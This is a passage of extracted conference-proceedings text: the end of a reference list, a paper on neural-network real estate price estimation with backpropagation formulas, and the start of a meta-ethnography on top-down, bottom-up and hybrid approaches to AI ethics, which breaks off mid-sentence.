X., Lin, W., Xue, P.: Just-noticeable difference estimation with pixels in images. J. Vis. Commun. 19(1), 30–41 (2007) 14. You, J., Korhonen, J.: Transformer for image quality assessment. In: IEEE International Conference on Image Processing (ICIP), Anchorage, Alaska, USA (2021) 15. Ke, J., Wang, O., Wang, Y., Milanfar, P., Yang, F.: MUSIQ: Multi-scale image quality transformer. In: IEEE/CVF International Conference on Computer Vision (ICCV), Virtual (2021) 16. You, J., Korhonen, J.: Attention integrated hierarchical networks for no-reference image quality assessment. J. Vis. Commun., 82 (2022) 17. Wu, J., Ma, J., Liang, F., Dong, W., Shi, G., Lin, W.: End-to-end blind image quality prediction with cascaded deep neural network. IEEE Trans. Image Process. 29, 7414–7426 (2020) 18. Su, S., Yan, Q., Zhu, Y., Zhang, C., Ge, X., Sun, J., Zhang, Y.: Blindly assess image quality in the wild guided by a self-adaptive hyper network. In: IEEE Computer Society Conference on Computer Vision and Pattern Recogniton (CVPR), Virtual (2020) 19. Karpathy, A., Toderici, G., Shetty, S., Leung, T., Sukthankar, R., Li, F.-F.: Large-scale video classification with convolutional neural networks. In: IEEE Computer Society Conference on Computer Vision and Pattern Recogniton (CVPR), Columbus, OH, USA (2014) 20. Varga, D., Szirányi, T.: No-reference video quality assessment via pretrained CNN and LSTM networks. Signal Image Video Proc. 13, 1569–1576 (2019)
472
J. You and Z. Zhang
21. Korhonen, J., Su, Y., You, J.: Blind natural video quality prediction via statistical temporal features and deep spatial features. In: ACM International Conference Multimedia (MM), Seattle, United States (2020) 22. Li, D., Jiang, T., Jiang, M.: Quality assessment of in-the-wild videos. In: ACM International Conference Multimedia (MM), Nice France (2019) 23. You, J., Korhonen, J.: Deep neural networks for no-reference video quality assessment. In: IEEE International Conference on Image Processing (ICIP), Taipei, Taiwan (2019) 24. Tu, Z., Wang, Y., Birkbeck, N., Adsumilli, B., Bovik, A.C.: UGC-VQA: Benchmarking blind video quality assessment for user generated content. IEEE Trans. Image Process. 30, 4449–4464 (2021) 25. You, J.: Long short-term convolutional transformer for no-reference video quality assessment. In: ACM International Conference Multimedia (MM), Chengdu, China (2021) 26. Göring, S., Skowronek, J., Raake, A.: DeViQ - A deep no reference video quality model. In: Proceedings of Human Vision and Electronic Imaging (HVEI), Burlingame, California USA (2018) 27. Li, X., Guo, Q., Lu, X.: Spatiotemporal statistics for video quality assessment. IEEE Trans. Image Process. 25(7), 3329–3342 (2018) 28. Lu, Y., Wu, J., Li, L., Dong, W., Zhang, J., Shi, G.: Spatiotemporal representation learning for blind video quality assessment. IEEE Trans. Circuits Syst. Video Technol. 32(6), 3500–3513 (2021) 29. Vaswani, A., et al.: Attention is all your need. In: Advance in Neural Information Processing System (NIPS), Long Beach, CA, USA (2017) 30. Devlin, J., Chang, M.-W., Lee, K., Toutanova, K.: BERT: Pre-training of deep bidirectional transformers for language understanding. In: Proceedings of NAACL-HLT, vol. 1, pp. 4171– 4186, Minneapolis, Minnesota, USA (2019) 31. Xing, F., Wang, Y-G., Wang, H., Li, L., and Zhu, G.: StarVQA: Space-time attention for video quality assessment. https://doi.org/10.48550/arXiv.2108.09635 (2021) 32. Kitaev, N., Kaiser, L., Levskaya, A.: Reformer: The efficient Transformer. In: International Conference on Learning Representations (ICLR), Virtual (2020) 33. Zhu, C., et al.: Long-short Transformer: Efficient Transformers for language and vision. In: Advance in Neural Information Processing System (NeurIPS), Virtual (2021) 34. Liu, Z., et al.: Swin Transformer: Hierarchical vision Transformer using shifted windows. In: IEEE/CVF International Conference on Computer Vision (ICCV), Virtual (2021) 35. Dosovitskiy, A., et al.: An image is worth 16x16 words: Transformers for image recognition at scale. In: International Conference on Learning Representations (ICLR), Virtual (2021) 36. Fang, Y., Zhu, H., Zeng, Y., Ma, K., Wang, Z.: Perceptual quality assessment of smartphone photography. In: IEEE Computer Society Conference on Computer Vision and Pattern Recogniton (CVPR), Virtual (2020) 37. Hosu, V., et al.: The Konstanz natural video database (KoNViD-1k). In: International Conference on Quality of Multimedia Experience (QoMEX), Erfurt, Germany (2017) 38. Wang, Y., Inguva, S., Adsumilli, B.: YouTube UGC dataset for video compression research. In: International Workshop on Multimedia Signal Processing (MMSP), Kuala Lumpur, Malaysia (2019) 39. Ying, Z., Niu, H., Gupta, P., Mahajan, D., Ghadiyaram, D., Bovik A.C.: From patches to pictures (PaQ-2-PiQ): Mapping the perceptual space of picture quality. In: IEEE Computer Society Conference on Computer Vision and Pattern Recogniton (CVPR), Virtual (2020) 40. Zhang, W., Ma, K., Zhai, G., Yang, X.: Uncertainty-aware blind image quality assessment in the laboratory and wild. IEEE Trans. Image Process 30, 3474–3486 (2021) 41. Li, D., Jiang, T., Jiang, M.: Unified quality assessment of in-the-wild videos with mixed datasets training. Int. J. Comput. Vis. 129, 1238–1257 (2021)
Visual Mechanisms Inspired Efficient Transformers
473
42. ITU-T Recommendation P.910. Subjective video quality assessment methods for multimedia applications,” ITU (2008) 43. Virtanen, T., Nuutinen, M., Vaahteranoksa, M., Oittinen, P., Häkkinen, J.: CID2013: A database for evaluating no-reference image quality assessment algorithms. IEEE Trans. Image Process 24(1), 390–402 (2015) 44. Ghadiyaram, D., Bovik, A.C.: Massive online crowdsourced study of subjective and objective picture quality. IEEE Trans. Image Process 25(1), 372–387 (2016) 45. Sinno, Z., Bovik, A.C.: Large-scale study of perceptual video quality. IEEE Trans. Image Process. 28(2), 612–627 (2019) 46. Jung, A.B., Wada, K., Crall, J., et al.: Imgaug, https://github.com/aleju/imgaug
A Neural Network Based Approach for Estimation of Real Estate Prices Ventsislav Nikolov(B) Technical University of Varna, Varna, Bulgaria [email protected]
Abstract. In this paper an automated approach is proposed for estimation of real estate prices based on historical examples. The approach is based on a neural network and various characteristics of the real estate, under consideration, are used in numerical values as input data. The output data is the prices, as there could be groups of examples according to some restriction as per the time period for selling. Keywords: Real estates · Prices estimation · Neural network · Training examples
1 Introduction Real estate market is quickly growing in recent years. It prospers especially during the years of economic development during the time between the crises. Real estates are among the long-term investment options and practically useful even if their current price is less than the prime cost. However not all real estates are sold easily and the sell period sometimes lasts a long time. One of the challenges for the real estate agencies and for the real estate owners is to determine what will be the best price for the real estate that is for sale. Normally this is done by relying on the agency broker experience or based on the owner’s research of the market prices of similar real estates. Moreover the statistics in most of the existing real estate web based software systems show only historical prices (Fig. 1). In this paper an automated approach is proposed for price suggestion based on the historical purchases of real estates with different characteristics. It could be of help to both the real estate agencies and the owners in determining the price that will most probably lead to fast and most profitable sell.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 474–481, 2023. https://doi.org/10.1007/978-3-031-28073-3_34
A Neural Network Based Approach for Estimation of Real Estate Prices
475
Fig. 1. Historical Real Estate Prices.
2 The Proposed Approach The proposed approach is based on training of a neural network with examples of a number of already sold real estates. Every real estate should have numerical assessment of a number of characteristics like: • • • • • • •
number of rooms; distance to the city center; distance to any transport points like airport, bus station or train station; distance to the nearest building; area in square meters; orientation (east, south, west or north); etc.
One of the main characteristics of the neural network is that they can work only with digital numbers. By presenting of a huge number of examples of already successfully sold real estates, the neural network can predict what will be the best price for a newly proposed real estate to the market. Normally the neural networks work in two stages, training and generation [6] of output data by new unknown input data, but there is no only one approach for their training. There are different architectures and training algorithms [1, 4, 5, 10] the main goal of which is to achieve optimal weight values of the connections between neurons. Here an implementation of backpropagation algorithm is presented below used for multilayer perceptron architecture [3, 7, 8, 9] – Fig. 2. 2.1 Training Input vectors are shown below as x and the output vectors as y. The number of the input neurons is A, number of hidden neurons is B and number of outputs is C. The symbol xi is used for the output values of the input neurons, those of the hidden neurons is hj , and of the outputs - ok . Index i is used for the input neurons, for the hidden neurons – j, and
476
V. Nikolov
Input neurons
Hidden neurons
Outpu t neurons
Area in sq. m Distance to city center …
Price
Fig. 2. Multilayer perceptron architecture.
for the output neurons – k. Every neuron from a given layer is connected to every neuron in the next layer. There are associated weights for these connections, as this between the input and hidden layer are wji , and between the hidden and output layer – wkj . A and B are determined from the dimensions of the input and output vectors √ of the training examples, B in our implementation is determined by formula C = A ∗ B rounded to the nearest integer value. Output values of the input elements are the same as their input values x1 …xA , but for the rest layers an activation function is used of type bipolar sigmoid [2]. Thus the data should be transformed in the bipolar sigmoid possible values ranging from -1 to 1. This is done by the following way. Minimal and maximal values are calculated for every input and output values: minin = min(x)
(1)
minout = min(y)
(2)
maxin = max(x)
(3)
maxout = max(y)
(4)
The ranges of the input and output values are calculated: Rin = maxin − minin
(5)
Rout = maxout − minout
(6)
Minimal and maximal values are determined and the intervals to which inputs and outputs have to be transformed (normalization interval). minnorm = −1
(7)
maxnorm = 1
(8)
Rnorm = maxnorm − minnorm
(9)
A Neural Network Based Approach for Estimation of Real Estate Prices
477
Coefficients of scaling and shifting are determined for input and output values: Scalein =
Rnorm Rin
(10)
Scaleout =
Rnorm Rout
(11)
Shift in = minnorm − minin ∗ Scalein
(12)
Shift out = minnorm − minout ∗ Scaleout
(13)
For every value from the input vectors x the transformed value xsi is calculated within the interval of minnorm to maxnorm : xsi = xi ∗ Scalein + Shift in
(14)
Transformed values for the output vectors are calculated in the same way: ysi = yk ∗ Scaleout + Shift out
(15)
The neural network is trained with xsi and ysi in a given number of epochs. In every epoch all training patterns are presented to the neural network and the weights of the connections between neurons are modified with a step called learning rate. In every epoch, for every training pattern the following calculations are performed. Forward Stage Sum weighted input value is calculated for every neuron in the hidden layer: net j =
A xsi wji
(16)
i=1
Output values for the hidden neurons are calculated: hj = f (net j )
(17)
In the same way the weighted input sum is calculated for the neurons in the output later: B net k = hj wkj
(18)
j=1
ok = f (net k )
(19)
Backward Stage For every output neuron the error is calculated as: ε=
1 (ys − ok )2 2 k
(20)
478
V. Nikolov
In order to calculate the modification of the connections weights between the hidden and output neurons the following gradient descent formula is used: wkj = −η
∂ε ∂wkj
(21)
where η is the learning rate, which is should be known before the training and normally is a small real value which determines the convergence rate, and the next multiplier (error derivative) is determined by the following way: ∂ε ∂ε ∂ok ∂net k = ∂wkj ∂ok ∂net k ∂wkj
(22)
∂ε = − ysk − ok ∂ok
(23)
∂ok = f (net k ) ∂net k
(24)
∂net k = hj ∂wkj
(25)
∂ε ∂ε ∂ok ∂net k = = − ysk − ok f (net k )hj ∂wkj ∂ok ∂net k ∂wkj
(26)
and taking into account that
then it follows that
and the modification of the weight is wkj = η ysk − ok f (net k )hj
(27)
Taking the following substitution: δk =
∂ε ∂ok ∂ok ∂net k
(28)
the modification of the weights of the connections between the input and hidden layer neurons can be calculated as: C ∂ε =η (29) wkj δ k f net j xsi wji = −η ∂wji k=1
After applying the modifications wji and wkj the steps from (16) to (29) are repeated for all training patterns. If the stop criterion of the training is not still met then these steps are performed again.
A Neural Network Based Approach for Estimation of Real Estate Prices
479
2.2 Generation of Output Vector by a New Unknown Input Vector When the neural network is used for pattern recognition or classification then the new input vectors do not have associated output vectors. The output vectors are generated from the neural network doing the calculations only from the forward stage. Before doing that the input vectors are transformed in the interval of activation function range, using the coefficients scale and shift obtained from the processing of the training patterns. After generation of the outputs, they are transformed back within the initial data interval: ysk =
ok − Shift out Scaleout
(30)
3 Software Realization The proposed approach is under progress and a prototype system is realized as shown in Fig. 3.
Fig. 3. The prototype software system.
The training examples are described in their numerical values with input and output vectors – Fig. 4. After loading the training data the settings of the system should be set and the training performed.
480
V. Nikolov
Fig. 4. Training examples.
When the training finishes, new input data is presented that comprises of only input vectors – Fig. 5.
Fig. 5. New input data.
The trained neural network generates new output data, shown in Fig. 6, representing the real estate price that should be transformed back to the original values according to (30).
Fig. 6. Generated output data.
4 Conclusion Some of the characteristics of the real estate cannot be assessed with numerical value. Such characteristics for example are the disposition of rooms, importance of rooms’
A Neural Network Based Approach for Estimation of Real Estate Prices
481
sizes, etc. That is why some such criteria can be fixed by the customers. In order to realize such an approach, clustering can be done according to the similarity of the criterion and for every cluster a separate neural network model can be trained. Thus local approach can be used separating the whole space of examples into subspaces. Another modification of the training algorithm is giving more importance to some training examples. Taking into account the priority τm of training example m the error function of output k is: 1 1 (τm yk − τm Ok )2 = τm (yk − Ok )2 2 2 In this case the priority is a constant. Thus the error term in the output is ∂ τm 21 (yk − Ok )2 ∂ 21 (yk − Ok )2 ∂εkm = = τm ∂wkj ∂wkj ∂wkj εkm =
(31)
(32)
As a consequence δkm = τm
∂εk ∂wkj
wkj = ηδkm hj = ητm δk hj
(33) (34)
And finally, as there are some neural network connections that are not signifficant, they can be reduced. In such a way some factors become more important than others during the estimation stage. Acknowledgment. The research, the results of which are presented in this publication, were carried out on a project NP3 “Research of models for management of processes for effective transition to an economy, based on 6G networks” within the framework of the scientific activity at Technical University of Varna, financed by the state budget.
References 1. Du, K.-L., Swamy, M.N.S.: Neural Networks in a Softcomputing Framework. Springer, (2006) 2. Fausett, L.: Fundamentals of Neural Networks: Architectures, Algorithms, and Applications. Prentice-Hall (1994) ISBN:0–13–334186–0 3. Hech-Nielsen, R.: Theory of the Backpropagation Neural Network. Neural networks for perception (Vol. 2): computation, learning, architectures. Hercourt Brace & Co., pp. 65–93 (1992) ISBN: 0–12–741252–2 4. Tarassenko, L.: A Guide to Neural Computing Applications. Elsevier (2004) 5. Zurada, J.: Introduction to artificial neural systems. West Publishing Co., St. Paul, MN (1992) 6. Kasabov, N.K.: Foundations of Neural Networks, Fuzzy Systems, and Knowledge Engineering. The MIT Press (1998) ISBN-10: 0–262–11212–4 ISBN-13: 978–0–262–11212–3 7. Galushkin, A.I.: Neural Networks Theory. Springer (2007) ISBN 978–3–540–48124–9 8. Touretzky, D.S.: 15–486/782: Artificial Neural Networks, Lectures, Carnegie Mellon Univeristy, Fall (2006) http://www.cs.cmu.edu/afs/cs.cmu.edu/academic/class/15782-f06/syl labus.html 9. Nisheva, M., Shishkov, D.: Artificial intelligence. Integral (1995) ISBN 954-8643-11 10. Kermanshahi, B.: Recurrent neural network for forecasting next 10 years loads of nine Japanese utilities. Neurocomputing 23(1), 125–133 (1998)
Contextualizing Artificially Intelligent Morality: A Meta-ethnography of Theoretical, Political and Applied Ethics Jennafer Shae Roberts(B) and Laura N. Montoya Accel AI Institute, San Francisco, CA, USA [email protected] http://www.accel.ai
Abstract. In this meta-ethnography, we explore three different angles of ethical artificial intelligence (AI) design implementation including the philosophical ethical viewpoint, the technical perspective, and framing through a political lens. Our qualitative research includes a literature review which highlights the cross referencing of these angles through discussing the value and drawbacks of contrastive top-down, bottom-up, and hybrid approaches previously published. The novel contribution to this framework is the political angle, which constitutes ethics in AI either being determined by corporations and governments and imposed through policies or law (coming from the top), or ethics being called for by the people (coming from the bottom), as well as top-down, bottom-up, and hybrid technicalities of how AI is developed within a moral construct and in consideration of its users, with expected and unexpected consequences and long-term impact in the world. There is a focus on reinforcement learning as an example of a bottom-up applied technical approach and AI ethics principles as a practical top-down approach. This investigation includes real-world case studies to impart a global perspective, as well as philosophical debate on the ethics of AI and theoretical future thought experimentation based on historical fact, current world circumstances, and possible ensuing realities. Keywords: Artificial intelligence · Ethics · Reinforcement learning · Politics
1 Introduction As a meta-ethnography, this paper will take an anthropological approach to the culture and development of artificial intelligence (AI) ethics and practices. This is in no way exhaustive, however it will magnify some of the key angles and tensions in the ethical AI field. We will be using the previously published [5, 31] framework of top-down and bottom-up ethics in AI and examining what this means in three different contexts: theoretical, technical, and political. Strategies for artificial morality have been discussed in a top-down, bottom-up and hybrid frameworks in order to create a foundation for
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 482–501, 2023. https://doi.org/10.1007/978-3-031-28073-3_35
Contextualizing Artificially Intelligent Morality
483
philosophical and technical re-flections on AI system development [5, 31]. Although there can be distinctions made between ethics and morality, we use the terms interchangeably. Top-down ethics in AI can be described as a rule-based system of ethics. These can come from philosophical moral theories (theoretical perspective), from topdown programming (technical perspective), [5] or by principles designated by authorities (political perspective). Bottom-up ethics in AI is contrastive to Top-down approaches and works without overarching rules. Bottom-up ethics in AI can come from learned experiences (theoretical perspective), from machine learning and reinforcement learning (technical perspective), [5] or from everyday people and users of technology calling for ethics (political perspective). Hybrid versions of top-down and bottom-up methods are a mixture of the two, or else somewhere in the middle, and can have various outcomes. The conclusions from this analysis show that ethics around AI is complex, and especially when deployed globally, its implementation needs to be considered from multiple angles: there is no one correct way to make AI that is ethical. Rather, care must be taken at every turn to right the wrongs of society through the application of AI ethics, which could create a new way of looking at what ethics means in our current digital age. This paper contextualizes top-down and bottom-up ethics in AI through analyzing theoretical, technical, and political implementations. Section 2 includes a literature review which states our research contributions and how we have built on existing research, as well as an outline of the framework utilized through-out. In Sect. 3, the first angle of the framework described is the theoretical moral ethics viewpoint: Ethics can formulate from the top-down, coming from rules and philosophies, or bottom-up which mirrors the behaviors of people and what is socially acceptable for individuals as well as groups, varying greatly by culture. Section 3.1 gives an example of fairness as a measure of the complexity of theoretical ethics in applied AI. Section 4 regards the technical perspective, which is exemplified by programming from the top and applied machine learning from the bottom: Essentially how to think about implementing algorithmic policies with balanced data that will lead to fair and desirable outcomes. Section 5 will examine the angle of top-down ethics dictated from the powers that be, and bottom-up ethics derived from the demands of the people: We will call this the political perspective. In Sect. 6, we will connect the perspectives all back together and reintegrate these concepts whilst we examine how they intertwine by first looking at the bottom-up method of AI being taught ethics using the example of reinforcement learning in Sect. 6.1. Section 7 combines perspectives from the top-down and illustrates this with Sect. 7.1 that provides examples of principles of AI ethics. An understanding of hybrid ethics in AI which incorporates top-down and bottom-up methods is included in Sect. 8, followed by case studies on data mining in Africa (Sect. 8.1) and the varying efficiency of contact tracing apps for COVID-19 in Korea and Brazil (Sect. 8.2). Following is a discussion in Sect. 9, and finally the paper’s conclusion in Sect. 10. This is an exercise in exploration to reach a deeper understanding of morality around AI. How ethics for AI works in reality is a blend of all of these theories and ideas acting on and in conjunction with one another. The aim of this qualitative analysis is to provide a framework to understand and think critically about AI ethics, and our hope is that this will influence the development of ethical AI in the future.
484
J. S. Roberts and L. N. Montoya
2 Literature Review The purpose of this paper is to deepen the understanding of the development of ethics in AI by cross-referencing a political perspective into the framework of top-down, bottomup and hybrid approaches, which only previously covered theoretical and technical angles [5]. Adding the third political perspective fills some of the gaps that were left by only viewing AI ethics theoretically and technically. The political perspective allows for the understanding about where the influence of power affects ethics in AI. Issues of power imbalances are often systemic, and systems of oppression can now be replicated without oversight with the use of AI, as it learns this from past human behaviour, such as favoring white faces and names in algorithms that are used for hiring and loans [17]. Furthermore, it is important to not ignore the fact that AI serves to increase wealth and power for large corporations and governments who have the most political influence [32]. While the influence of politics on the development of AI ethics has been described previously, never has it been discussed in comparison with the technical and theoretical lens while also utilizing the top-down, bottom-up, and hybrid frameworks for development. By engaging with and expanding on the framework of top-down, bottom-up and hybrid ethics in AI, we can gain a deeper understanding of how ethics could be applied to technology. There has been debate about whether ethical AI is even possible, [21] and it is not only due to programming restrictions but to the fact that AI exists in an unethical world which values wealth and power for the people already in power above all else [21]. This is why the political perspective is so vital to this discussion. By political, we do not refer to any particular political parties or sides, but rather, as a way of talking about power, both corporate and government. As defined in the Merriam Webster dictionary, political affairs or business refer to ‘competition between competing interest groups or individuals for power and leadership (as in a government) [18]. The articles we chose to include in this literature review paint a picture of the trends in AI ethics development in the past two decades. Table 1 features a list of primary research contributions and which frameworks they discuss. The first mention of the framework we use to talk about ethics in AI from the top-down, bottom-up and a mix of the two (hybrid) originated with Allen, Smit and Wallach in 2005. [5] The same authors penned a second article on this framework for machine morality in 2008 [31]. The authors described two different angles of approaching AI morality as being the theoretical angle and the technical angle (but not the political angle). In 2017, [13] an article was written that explored humanity’s ethics and the influence on AI ethics, for better or worse. Although the authors did not acknowledge politics or power directly, they did discuss the difference between legality and personal ethics. Next we see a great deal of focus on AI principles, as exemplified by the work of Whittlestone et al. in 2019, [32] which also discusses political tensions and other ethical tensions in principles of AI ethics outright. This is important as it questions where the power is situ-ated, as is a central tenet to our addition to this area of research. These papers which describe the political lens and tensions of power and political influence are lacking in the framework of top-down, bottom-up, and hybrid ethical AI implementations.
Contextualizing Artificially Intelligent Morality
485
Table 1. Literature contributions including frameworks cross-referenced Authors and year
Contribution
Frameworks cross-referenced
Allen, Smit, & Wallach (2005) First paper to use top-down/bottom-up/ hybrid framework for describing artificial morality
Theoretical and technical perspectives alongside the topdown, bottom-up, and hybrid framework
Wallach, Allen, & Smit (2008) Values and limitations of top-down imposition and bottom-up building of ethics in AI
Theoretical and technical perspectives alongside the topdown, bottom-up approaches
Etzioni & Etzioni (2017)
Ethical choices of humans over millennia as a factor in building ethical AI
Technical applied development, and political perspectives described but without the top-down, bottom-up framework
Whittlestone, Nyrup, Alexandrova, & Cave (2019)
Tensions within principles of AI ethics
Theoretical and political lens for ethical AI development without the technical perspective and without mention of the top-down, bottomup, and hybrid development framework
Phan, Goldenfein, Mann, & Kuch (2021)
Questions the ethics of Big Political lens for ethical AI Tech taking responsibility and development without the addresses ethical crises technical or theoretical perspectives and without mention of the top-down, bottom-up, and hybrid development framework
Our methodology utilizes the top-down, bottom-up, and hybrid framework for the development of AI ethics and cross-references it with the technical, the-oretical, and political lenses which we will explore more deeply in the following sections. Table 2 lists these cross-references in simplified terms for the reader.
486
J. S. Roberts and L. N. Montoya Table 2. Framework for contextualizing AI ethics
Approach
Top-down
Bottom-up
Hybrid
Technical
Programmed rules Ex: Chatbot
Machine learning Ex: Reinforcement learning
Has a base of rules or instructions, but then also is fed data to learn from as it goes Ex: Autonomous vehicles employ some rule-based ethics, while also learning from other drivers and road experience
Theoretical Rule-utilitarianism and deontological ethics, principles, ie fairness Ex: consequentialist ethics, Kant’s moral imperative and other duty based theories
Experiencebased, Casebased reasoning Ex: learn as you go from real-world consequences
Personal moral matrix combining rules and learned experience Ex: having some rules but also developing ethics through experiences
Political
People power Ex: groups A combination of ethics online of individuals from those in power who calling for ethics in AI take into account ethics called for by the people Ex: employees collaborating with their corporation on ethical AI issues
Corporate and political powers Ex: corporate control over what is ethical for the company
3 Theoretical AI Morality: Top-Down vs Bottom-Up The first area to consider is ethics from a theoretical moral perspective. The primary point to mention in this part of the analysis is that ethics has been historically made for people, and people are complex in how they understand and apply ethics, especially top-down ethics. At an introductory glance, “top-down” ethical theories amount to rule-utilitarianism and deontological ethics, where “bottom-up” refers to case-based reasoning [30]. Theoretical ethics from a top-down perspective includes examples such as the Golden Rule, the Ten Commandments, consequentialist or utilitarian ethics, Kant’s moral imperative and other duty based theories, Aristotle’s virtues, and Asimov’s laws of robotics. These are coming from a wide range of perspectives, including literature, philos-ophy, and religion [31]. Most of these collections of top-down ethical principles are made solely for humans. The one exception on this list that does not apply to people is of course Asimov’s laws of robotics that are applied precisely for AI. However, Asimov himself said that they were flawed. Azimov used storytelling to demonstrate that his three laws, plus the ‘ze-roth’ law added in 1985, had problems of prioritization and potential deadlock. He showed that ultimately, the laws would not work, despite the surface-level appearance of putting
Contextualizing Artificially Intelligent Morality
487
humanity’s interest above that of the individual. This has been echoed by other theorists on any rule based system implemented for ethical AI. Asimov’s rules of robotics seemingly encapsulate a wide array of ethical concerns, giving the impression of being intuitive and straightforward. However, in each of his stories, we can see how they fail time after time [5]. Much of science fiction does not predict the future as much as warn us against its possibilities. The top-down rule-based approach to ethics presents different challenges for AI than in systems that were originated for humans. As humans, we learn ethics as we go, from observation of our families and community, including how we react to our environment and how others react to us. Etzioni and Etzioni [13] made the case that humans first acquire moral values from those who raise them, although it can be argued that individuals make decisions based on their chosen philosophies. As people are exposed to various inputs from new groups, cultures and subcultures, they modify their core value systems, gradually developing their own personal moral matrix [13]. This personal moral mix could be thought of as a hybrid model of ethics for humans. The question is, how easy and practical is it to take human ethics and apply them to machines? Some would say it is impossible to teach AI right and wrong, if we could even come to an agreement on how to define those terms in the first place. Researchers have stressed the importance of differences in the details of ethical systems across cultures and between individuals, even though shared values exist that transcend cultural differences [5]. There simply is not one set of ethical rules that will be inclusive for everyone. 3.1 The Example of Fairness in AI Many of the common systems of values that experts agree need to be considered in AI include fairness, or to take it further, justice. We will work with this concept as an example. We have never had a fair and just world, so to teach an AI to be fair and just does not seem possible. But what if it was? We get into gray areas when we imagine the open-ended potential future of AI. Imagining it could actually improve the state of the world, as opposed to imagining how it could lead to further destruction of humanity could be what propels us in a more positive direction. Artificial intelligence should be fair. The first step is to agree on what a word like fairness means when designing AI. Many people pose the question: Fairness for whom? Then there is the question of how to teach fairness to AI. AI systems as we know are machines. Machines are good at math. Mathematical fairness and social fairness are two very different things. How can this be codified? Can an equation which solves or tests for fairness between people be developed? Most AI is built to solve problems of convenience and to automate tedious or monotonous tasks in order to free up our time and make more money. There is a disconnect between what Allen et al. [5] refer to as the spiritual worldviews from which much of our ethical understanding originates, and the materialistic worldview of computers and robots, which is not completely compatible. It can be seen every day in the algorithms that discriminate and codify what retailers think we are most likely to consume. For example, in the ads they show us as we scroll, we often see elements that don’t align with our values but rather appeal to our habits of consumption. At the core level, these values are twisted to benefit the current capitalistic
488
J. S. Roberts and L. N. Montoya
systems and have little to do with actually improving our lives. We cannot expect AI to jump from corporate materialism to social justice, or reach a level of fairness, simply by tweaking the algorithms. Teaching ethics to AI is extremely challenging – if not impossible – on mul-tiple fronts. In order to have ethical AI we need to first evaluate our own ethics. Douglas Rushkoff, well-known media theorist, author and Professor of Media at City University of New York, wrote: “…the reason why I think AI won’t be developed ethically is because AI is being developed by companies looking to make money – not to improve the human condition… My concern is that even the ethical people still think in terms of using technology on human beings instead of the other way around. So, we may develop a ‘humane’ AI, but what does that mean? It extracts value from us in the most ‘humane’ way possible?” [23]. This is a major consideration for AI ethics, and the realities of capitalism don’t align with ethics and virtues such as fairness. One of the biggest questions when considering ethics for AI is how to implement something so complex and philosophical into machines that are contrastingly good at precision. Some say this is impossible. “Ethics is not a technical enterprise, there are no calculations or rules of thumb that we could rely on to be ethical. Strictly speaking, an ethical algorithm is a contradiction in terms.” (Vachnadze, 2021) [29] The potential possibilities for technical application of AI morality.
4 Technical AI Morality: Top-Down vs Bottom-Up One way to think about top-down AI from the technical perspective, as noted by Eckart, [11] is to think of it as a decision tree, often implemented in the form of a call center chat bot. The chat bot guides the user through a defined set of options depending on the answers inputted. Eckart continues by describing bottom-up AI as what we typically think of when we hear artificial intelligence: utilizing machine learning and deep learning. As an example, we can think about the AI utilized for diagnostic systems in healthcare and self-driving cars. These bottom-up systems can learn automatically without explicit programming from the start [11]. Top-down systems of learning can be very useful for some tasks that machines can be programmed to do, like the chatbot example above. However, if they are not monitored, they could make mistakes, and it is up to us as people to catch those mistakes and correct them, which is not always possible with black boxes in effect. There may also be a lack of exposure to sufficient data to make a decision or prediction in order to solve a problem, leading to system failure. Here is the value of having a ‘human in the loop’. This gets complicated even further when we move into attempting to program the more theoretical concepts of ethics. Bottom-up from the technical perspective, which will be described in depth below, follows the definition of machine learning. The system is given data to learn from, and it uses that information from the past to predict and make decisions for the future. This can work quite well for many tasks. This approach can also have a lot of flaws built in, because the world that it learns from is flawed. We can look at the classic example of harmful biases being learned and propagated through a system, for instance in who gets a job or a loan, because the data from the past reflects biased systems in our society [17].
Contextualizing Artificially Intelligent Morality
489
Technical top-down and bottom-up ethics in AI primarily concerns how AI learns ethics. Machines don’t learn like people do. They learn from the data that is fed to them, and they are very good at certain narrow tasks, such as memorization or data collection. However, AI systems can fall short in areas such as objective reasoning, which is at the core of ethics. Whether coming from the top-down or bottom-up, the underlying concern is that teaching ethics to AI is extremely difficult, both technically and socially. Ethics and morality prove difficult to come to an actual consensus on. We live in a very polarized world. What is fair to some will undoubtedly be unfair to others. There are several hurdles to overcome. Wallach et al. [31] describe three specific challenges to address in this matter, paraphrased below: 1. Scientists must break down moral decision making into its component parts, which presents an engineering task of building autonomous systems in order to safeguard basic human values. 2. Which decisions can and cannot be codified and managed by mechanical systems needs to be recognized. 3. Designing effective and cognitive systems which are capable of managing ambiguity and conflicting perspectives needs to be learned [31]. Here we will include the use of a hybrid model of top-down and bottom-up ethics for AI that has a base of rules or instructions, but then also is fed data to learn from as it goes. This method claims to be the best of both worlds, and covers some of the shortcomings of both top-down and bottom-up models. For instance, self-driving cars can be programmed with laws and rules of the road, and also can learn from observing human drivers. In the next section we will explore more of the political angle of this debate.
5 Political AI Morality: Top-Down vs. Bottom-Up We use the term political to talk about where the power and decision making is coming from, which then has an effect that radiates outward and influences systems, programmers, and users alike. As an example of top-down from a political perspective, this paper will largely concern itself with principles of ethics in AI, often stated by corporations and organizations. Bottom-up ethics in AI from a political standpoint concerns the perspectives of individuals and groups who are not in positions of power, yet still need a voice. The Asilomar AI Principles [3] are an example of a top-down model and have their critiques. This is a comprehensive list of rules that was put out by the powers that be in tech and AI, with the hopes of offering guidelines for de-veloping ethics in AI. Published in 2017, this is one key example of top-down ethics from the officials including 1,797 AI/Robotics Researchers and 3,923 other Endorsers affiliated with the Future of Life Institute. These principles outline ethics and values that the use of AI must respect, provide guidelines on how research should be conducted, and offer important considerations for thinking about long-term issues [3]. Congruently, another set of seven principles for Algorithmic Transparency and Accountability were published by the US
490
J. S. Roberts and L. N. Montoya
